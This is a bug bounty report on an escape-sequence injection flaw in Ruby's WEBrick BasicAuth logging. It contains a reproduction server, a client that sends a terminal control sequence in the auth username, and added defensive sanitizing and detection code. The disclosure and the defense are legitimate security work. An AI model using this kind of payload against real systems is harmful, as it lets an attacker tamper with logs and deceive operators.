Ruby: Escape sequence injection vulnerability in WEBrick BasicAuth

HackerOne report H1:223363
Reported: 2017-04-24 10:25:41
Reporter: mame
Source: hackerone.com
Bounty: $500

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.012 Low
Percentile: 83.2%

WEBrick BasicAuth outputs any non-existing user name to its logs without sanitizing it. By exploiting this, an attacker can inject malicious escape sequences into the logs. This issue is exactly the same as the old, already-fixed vulnerability.

How to reproduce:

  1. Run this WEBrick server program in a terminal.

require "webrick"
require "webrick/httpauth"

srv = WEBrick::HTTPServer.new({ Port: 34567 })
# Htpasswd.new creates the file if it does not exist, so the user DB starts empty
# and every user name presented is "not allowed".
db = WEBrick::HTTPAuth::Htpasswd.new("dot.htpasswd")
authenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: "realm")
srv.mount_proc("/") do |req, res|
  authenticator.authenticate(req, res)
  res.body = "foobar"
end
srv.start

  2. Run this attack access program in another terminal.

require "open-uri"

# URI.open is used instead of the bare Kernel#open that open-uri used to override;
# the latter was removed in Ruby 3.0. The request is otherwise unchanged.
URI.open("http://localhost:34567/login",
  http_basic_authentication: [
    "ESCAPE SEQUENCE HERE->\e]2;BOOM!\a<-SEE WINDOW TITLE",
    "passwd"
  ]).read

  3. See the first terminal that runs the server. You will see a line like this, and its window title changed to “BOOM!”.

[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-><-SEE WINDOW TITLE: the user is not allowed.

Note: I’m a member of the ruby-core team, but I’m not involved with the development of WEBrick. I did not create the bug, of course. I will happily accept any bounty, if any :-)
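The defensive counterpart to the report above, as an added example that is not WEBrick's code or the fix it shipped: before an attacker-controlled value such as the Basic auth user name reaches a log line, every terminal control character (ESC, BEL, the C1 range) is rewritten as a visible \xNN escape, so the log stays a single line and the terminal never interprets it. The `sanitize_for_log`, `control_sequence?` and `basic_auth_error_line` names are assumptions for this example; the sample user name is constructed to mirror the one in the report.

```ruby
# Added example (hypothetical helpers, not WEBrick's own code):
# neutralise terminal control characters before logging untrusted input.

# C0 controls (0x00-0x1F), DEL (0x7F) and C1 controls (0x80-0x9F). This
# covers ESC (0x1B), BEL (0x07) and the 8-bit CSI/OSC introducers.
CONTROL_CHARS = /[\u0000-\u001F\u007F\u0080-\u009F]/

# Replace each control character with a literal \xNN so that the value is
# still readable in the log but can no longer drive the terminal.
def sanitize_for_log(value)
  value.to_s.gsub(CONTROL_CHARS) { |c| format("\\x%02X", c.ord) }
end

# Detection helper for auditing request headers or existing log files:
# true when the value carries at least one terminal control character.
def control_sequence?(value)
  CONTROL_CHARS.match?(value.to_s)
end

# Constructed sample, mirroring the user name sent by the reproduction above.
SAMPLE_USER = "ESCAPE SEQUENCE HERE->\e]2;BOOM!\a<-SEE WINDOW TITLE"

# The shape of the BasicAuth error line from the report, with the user name
# sanitized before interpolation. `time` is injectable for deterministic tests.
def basic_auth_error_line(realm, user, time = Time.now)
  stamp = time.strftime("[%Y-%m-%d %H:%M:%S]")
  "#{stamp} ERROR Basic #{realm}: #{sanitize_for_log(user)}: the user is not allowed."
end

if __FILE__ == $0
  # Prints the line with \x1B and \x07 spelled out instead of raw bytes.
  puts basic_auth_error_line("realm", SAMPLE_USER)
  puts "raw value contains control sequence: #{control_sequence?(SAMPLE_USER)}"
end
```

Escaping rather than stripping is deliberate: the log still shows exactly what was sent, which is what an incident responder wants to see, while the bytes that would have changed the window title or clobbered the line are inert.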
